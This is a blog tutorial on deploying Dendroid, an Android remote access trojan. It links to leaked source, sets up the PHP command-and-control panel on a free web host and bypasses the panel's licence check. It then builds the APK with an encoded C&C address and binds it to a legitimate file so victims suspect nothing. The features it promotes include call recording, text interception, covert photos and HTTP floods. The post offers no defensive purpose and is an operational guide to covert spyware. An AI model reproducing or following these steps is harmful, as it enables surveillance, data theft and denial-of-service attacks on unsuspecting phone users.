Advertisements

Dendroid – Android RAT

Dendroid is a HTTP RAT that is marketed as being transparent to the user and firmware interface, having a sophisticated PHP panel, and an application APK binder package.

The seller markets Dendroid as offering many features that have never been seen before and comes with 24/7 support, all for a once off payment of $300 to be paid through BTC, LTC, BTC-e, or other services. Some of the many features on offer include the following:

  • Delete call logs
  • Call a phone number
  • Open Web pages
  • Record calls and audio
  • Intercept text messages
  • Take and upload photos and videos
  • Open an application
  • Initiate a HTTP flood (DoS) for a period of time
  • Change the command-and-control (C&C) server
It was first offered on black markets for 300$, but after the leak you can get it for free: http://ge.tt/2nSvLv82/v/0. If you prefer Open-Source Tools you can either use the github Link: https://github.com/qqshow/dendroid.

Required:

First you need the Dendroid Source, given above.

Then you need the Android SDK and Eclipse with Android ADT: SDK Tools Only http://developer.android.com/sdk/index.html#Other and Android ADT for Eclipse (Of course you need Eclipse too). Installation of them is explained later.

And at least you need a Webserver with PHP and MySql. For example http://bplaced.net

Setting Up the Web Panel

I will use bplaced.net as an example for setting up the webserver:

  1. Create an Account (The username is the Domain of your Server)
  2. Now You see the control panel of your Webserver
  3. Navigate to http://www.bplaced.net/?handler=mysql and add a MySql database
  4. Now go to phpmyadmin (phpmyadmin.<username>.bplaced.net)
  5. Select your Database on the left side of phpmyadmin and then click on import at the top and add the Sql file located in Dendroid>Dendroid Panel>Other files. This should add the required Tables

Navigate to the Dendroid Panel Folder and then to the Folder “Panel”. Open applysettings.php, blockbot.php ,deletebot.php ,deletefile.php ,deletepics.php ,functions.php, table.php, clearawaiting.php, clearmessages.php In your text editor of your choice. In every file you will see $url = “http://pizzachip.com/rat/”; Change this adress with the adress of your Webserver, for example: $url = “http://dendroid.bplaced.net“;

Open get.php, get-functions.php, new-upload.php ,upload-pictures.php ,find the line { if($GET‘Password’ == “keylimepie”) } Change keylimepie to your Database password assigned in Step 3

Open reg.php and delete the script. The whole Script has to be this:
<?php
$validDomain = “true”;
?>

Now control the files whether they are correct configured. If they are wrong configured Dendroid wont work!

Upload

If you are sure everything went right, you have to upload the content of the folder Dendroid Panel to your webserver. I suggest to use FileZilla, which is easy to understand. For example if you use bplaced, the login credentials are: Server: <username>.bplaced.net Username: <username> Password: Password of your bplaced account ,Leave the port field blank

On the left side you can see your files and on the right side you see the files of your webserver. Delete the Files of your webserver and then copy the content of your Dendroid Panel folder to the webserver.

Dendroid Setup

Navigate in your browser to your webserver <username>.bplaced.net.
You should be greeted with a setup form.
The required Settings:
Database Username: Your username of the Sql Database
Database Password: Your Password of the Sql Database
Database Host: Host of your Sql Database (In bplaced.net: localhost)
Database Name: Your Database name (In bplaced.net: Username of your account)
Bot List Refresh Time & File List Refresh Time & Message Box Refresh Time: Set all to 10
Username: Use the username you want to use for logging in to the control panel
Password: Same for the Password
Bot Offline Time: 10
Time Zone: Is clear, isn`t it?
Message Box Font Size: 10

Setting Up the Dendroid Apk

Now you have to open the SDK Manager you have downloaded at the start. You can download everything you want, but important is the API 10.

Set up the ADT for Eclipse. This is a good Tutorial for this: http://www.instructables.com/id/How-To-Setup-Eclipse-for-Android-App-Development/step5/Obtain-Eclipse-IDE/ Follow the instructions till step 9.

Click File > New > Project > Android > Android Project From Existing Code > Next > Browse > Open the path to the Dendroid source then Dendroid Apk > Finish

Click the Drop Down Arrow for Dendroid > src > com.connect > Then click MyService To Open it.

Use base64encode.org to encode your url and the Password of your webserver. Change the variables encodedURL and backupURL to your encoded webserver URL, but pay attention that you use for example http://dendroid.bplaced.net and not http://dendroid.bplaced.net/

This is required to get Dendroid running.
Paste the encoded Password in the Password Field.

Now click on project>properties. Here you have to ckeck the API level 10 or Android 2.3.3, to get compiling working.

Click on your project in the project Manager on the left side of Eclipse and press F2 to rename the Project to “Dendroid”. Then Click File > Export > Android > Export Android Application > Select Dendroid.

Click Ok, then next. Now check “Create new keystore”. The location and the password don’t matter. Click next again, then use everything as name and password. The validity can be 1000 Years. Now you can change the destination of the output apk and finish the compilation.

Now bind the apk to a legitimate file so that the end user will not suspect anything.
You can watch the video tutorial here – https://www.youtube.com/watch?v=FvaCkPQXTWY
Advertisements

Leave a Reply

Your email address will not be published. Required fields are marked *

Advertisements
Advertisements
Advertisements
Advertisements
%d bloggers like this: